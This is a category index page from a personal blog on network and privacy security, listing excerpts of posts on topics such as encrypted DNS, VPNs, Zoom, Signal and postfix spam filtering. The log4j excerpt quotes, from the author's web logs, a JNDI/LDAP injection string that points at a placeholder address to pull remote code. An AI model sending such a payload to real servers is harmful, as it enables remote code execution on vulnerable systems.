Category: network (in)security

mobile (in)security

In my last post, an ex GCHQ staffer is quoted as saying: “If you’re stepping back a bit and saying what cars do park outside GCHQ or somewhere like Porton Down then you have the pool of information there if you ever need it.” which got me wondering about how secure existing protective measures around …

Continue reading

Permanent link to this article: https://baldric.net/2023/01/16/mobile-insecurity/

brakes-as-a-service

Some parts of the UK press have been reporting recently on the “discovery” of “hidden Chinese tracking devices” in a UK Government car (the original inews report is behind a paywall). The reports quote a “serving member of the British intelligence community” as telling the i newspaper: “It [the tracking SIM] gives the ability to survey …

Continue reading

Permanent link to this article: https://baldric.net/2023/01/16/brakes-as-a-service/

signal failure

I use signal as my instant messenger app on my ‘phone and I have the desktop version installed on my, well, desktop. Signal was written by the kind of people I trust and in my view it is infinitely better than plain unencrypted SMS and much better than any of the alternative IMs around (whatsapp, …

Continue reading

Permanent link to this article: https://baldric.net/2022/12/30/signal-failure/

log4j

I guess that there are a lot of busy sysadmins around at the moment. My web logs are full of crud like: “GET /$%7Bjndi:ldap://123.345.567:789/Exploit%7D” and much lengthier entries trying to exploit the log4j vulnerability. In my case (and for this instance) I’m not that bothered because, luckily, I don’t run Apache, or any of its …

Continue reading

Permanent link to this article: https://baldric.net/2021/12/17/log4j/

zuck off facebook

Or how to block the entire Facebook network. In my last post on Facebook’s misfortunes I mentioned that my wife initially blamed me, assuming it was just local and that I had made some new change to my local network configuration. Now whilst I do actually bin some of Facebook’s more annoying subdomains (such as …

Continue reading

Permanent link to this article: https://baldric.net/2021/10/15/zuck-off-facebook/

nothing to hide, nothing to fear

I recently came across this rather nice (spoof) NSA site describing the work of the Agency’s “Domestic Surveillance Directorate”. That Directorate supposedly exists to protect the citizen from the usual suspects (terrorists, paedophiles, criminals) and is tasked with data collection and analysis to support that end. The site says: “Our value is founded on a …

Continue reading

Permanent link to this article: https://baldric.net/2021/05/27/nothing-to-hide-nothing-to-fear/

RIP Dan Kaminsky

I learned today that Dan Kaminsky died on Friday 23 April of complications arising from his diabetes. (I would probably have learned earlier if I followed twitter, but I don’t.) He was only 42. I met Kaminsky at an MSRC Bluehat Forum in 2009. He was only 30 at the time, but already widely respected, …

Continue reading

Permanent link to this article: https://baldric.net/2021/04/29/rip-dan-kaminsky/

comment spam irony

image of spam comment on blog

I am very careful about how, or even if, I allow comments on trivia. For example I disallow all comments on any post after a set period of time, I also refuse all comments until I have had time to read and thus moderate them. This cuts down on the type of rubbish often seen …

Continue reading

Permanent link to this article: https://baldric.net/2020/11/15/comment-spam-irony/

encrypting DNS on android

My previous two posts discussed the need for encrypted DNS and then how to do it on a linux desktop. I do not have any Microsoft systems so I have no idea how to approach the problem if you use any form of Windows OS, nor do I have any Apple devices so I can’t …

Continue reading

Permanent link to this article: https://baldric.net/2020/06/06/encrypting-dns-on-android/

encrypting DNS with dnsmasq and stubby

In my last post I explained that in order to better protect my privacy I wanted to move all my DNS requests from the existing system of clear text requests to one of encrypted requests. My existing system forwarded DNS requests from my internal dnsmasq caching servers to one of my (four) unbound resolvers and …

Continue reading

Permanent link to this article: https://baldric.net/2020/05/25/encrypting-dns-with-dnsmasq-and-stubby/

encrypting DNS

Any casual reader of trivia will be aware that I care about my privacy and that I go to some lengths to maintain that privacy in the face of concerted attempts by ISPs, corporations, government agencies and others to subvert it. In particular I use personally managed OpenVPN servers at various locations to tunnel my …

Continue reading

Permanent link to this article: https://baldric.net/2020/05/06/encrypting-dns/

zooming in on china

Since my previous post below, I have been reading up on Zoom as a company, its staffing and its worrying security (or rather lack of) track record. When I wrote the initial post I said that “Zoom is a US company funded almost entirely by venture capital. Its servers are US based.”. It appears that …

Continue reading

Permanent link to this article: https://baldric.net/2020/04/10/zooming-in-on-china/

zooming in on cabinet

On Tuesday of this week, Boris Johnson tweeted a picture of what he called the UK’s “first ever digital Cabinet”. That picture (copy below) shows that the Cabinet meeting was held using Zoom – the sort of video conferencing software which is currently popular with business users forced to work at home during the Covid19 …

Continue reading

Permanent link to this article: https://baldric.net/2020/04/03/zooming-in-on-cabinet/

beware the zombie apocalypse

Tom Scott is a young educational entertainer who publishes fairly regularly on youtube. Back in mid 2004, whilst still a linguistics student at York, he managed to upset both the Home Office and the Cabinet Office by publishing a Department of Vague Paranoia website spoofing the rather po faced official “Preparing for Emergencies” site. Tom’s …

Continue reading

Permanent link to this article: https://baldric.net/2020/03/11/beware-the-zombie-apocalypse/

have I been pwned?

Well, I don’t think so. But for a while I was not entirely sure. Following the move last November of trivia from a VM on UK2’s datacentre in London to our new home on a faster VM on ITLDC’s network I have been making a variety of minor changes and doing some essential housework. One …

Continue reading

Permanent link to this article: https://baldric.net/2020/02/27/have-i-been-pwned/

TLS certificate checks

immuniweb result

My move of trivia to a new VM last December prompted me to look again at my server configuration. In particular I wanted to ensure that I was properly redirecting all HTTP requests to HTTPS and that the ciphers and protocols I support are as up to date and strong as possible. Mozilla offers a …

Continue reading

Permanent link to this article: https://baldric.net/2020/01/22/tls-certificate-checks/

openvpn clients on pfsense

In my 2017 article on using OpenVPN on a SOHO router I said: “In testing, I’ve found that using a standard OpenVPN setup (using UDP as the transport) has only a negligible impact on my network usage – certainly much less than using Tor.” That was true back then but is unfortunately not so true …

Continue reading

Permanent link to this article: https://baldric.net/2019/07/07/openvpn-clients-on-pfsense/

one unbound and you are free

I have written about my use of OpenVPN in several posts in the past, most latterly in May 2017 in my note about the Investigatory Powers (IP) Bill. In that post I noted that all the major ISPs would be expected to log all their customers’ internet connectivity and to retain such logs for so …

Continue reading

Permanent link to this article: https://baldric.net/2019/06/26/one-unbound-and-you-are-free/

postfix sender restrictions – job NOT done

OK, I admit to being dumb. I got another scam email yesterday of the same formulation as the earlier ones (mail From: me@mydomain, To: me@mydomain) attempting to extort bitcoin from me. How? What had I missed this time? Well, this was slightly different. Checking the mail headers (and my logs) showed that the email had …

Continue reading

Permanent link to this article: https://baldric.net/2019/02/16/postfix-sender-restrictions-job-not-done/

postfix sender restrictions

I mentioned in my previous post that I had recently received one of those scam emails designed to make the recipient think that their account has been compromised in some way and that, furthermore, that compromise has led to malware being installed which has spied on the user’s supposed porn habits. The email then attempts …

Continue reading

Permanent link to this article: https://baldric.net/2019/01/24/postfix-sender-restrictions/

well I never

It’s not often that I find myself agreeing with GCHQ, but ex GCHQ Director Robert Hannigan’s recent comments in an interview with the BBC Today programme struck a chord. Hannigan headed GCHQ from April 2014 until his resignation for family reasons last year. Whilst in post he pushed for greater transparency at the SIGINT agency. …

Continue reading

Permanent link to this article: https://baldric.net/2018/12/11/well-i-never/

re-encrypting trivia

Back in June 2015 I decided to force all connections to trivia over TLS rather than allow plain unencrypted connections. I decided to do this for the obvious reason that it was (and still is) a “good thing” (TM). In my view, all transactions over the ‘net should be encrypted, preferably using strong cyphers offering …

Continue reading

Permanent link to this article: https://baldric.net/2018/07/07/re-encrypting-trivia/

using a VPN to take back your privacy

network diagram

With the passage into law of the iniquitous Investigatory Powers (IP) Bill in the UK at the end of November last year, it is way past time for all those who care about civil liberties in this country to exercise their right to privacy. The new IP Act permits HMG and its various agencies to …

Continue reading

Permanent link to this article: https://baldric.net/2017/05/12/using-a-vpn-to-take-back-your-privacy/

guest network

Last month Troy Hunt posted an interesting comment on his blog about the problems around the etiquette of allowing guests onto your home wifi network. In his post, Hunt notes that guests can be deeply offended at being refused access. This is understandable. If they are guests in your home then they are probably close …

Continue reading

Permanent link to this article: https://baldric.net/2016/01/24/guest-network/